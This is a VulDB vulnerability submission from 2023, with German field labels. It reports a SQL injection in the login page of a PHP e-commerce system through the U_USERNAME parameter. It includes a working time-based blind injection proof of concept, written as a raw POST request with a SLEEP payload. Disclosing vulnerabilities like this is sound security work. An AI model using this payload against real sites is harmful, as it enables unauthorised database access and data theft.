| Titel | E-Commerce System login.php SQL Injection Vulnerability |
|---|
| Beschreibung | E-Commerce System has a SQL Injection Vulnerability in its common user login function, the vulnerable URI is '/ecommerce/login.php' , and the injectable parameters is U_USERNAME
A time-based blind injection poc is below:
POST /ecommerce/login.php HTTP/1.1
***************************************
proid=1&U_USERNAME=123' AND (SELECT 6283 FROM (SELECT(SLEEP(5)))qFDz) AND 'OWHz'='OWHz&U_PASS=123&modalLogin=
Then the server will response after 5s , which proves the vul |
|---|
| Quelle | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| Benutzer | WWesleywww (UID 43117) |
|---|
| Einreichung | 20.03.2023 07:53 (vor 3 Jahren) |
|---|
| Moderieren | 20.03.2023 08:33 (39 minutes later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 223410 [SourceCodester E-Commerce System 1.0 login.php U_USERNAME SQL Injection] |
|---|
| Punkte | 20 |
|---|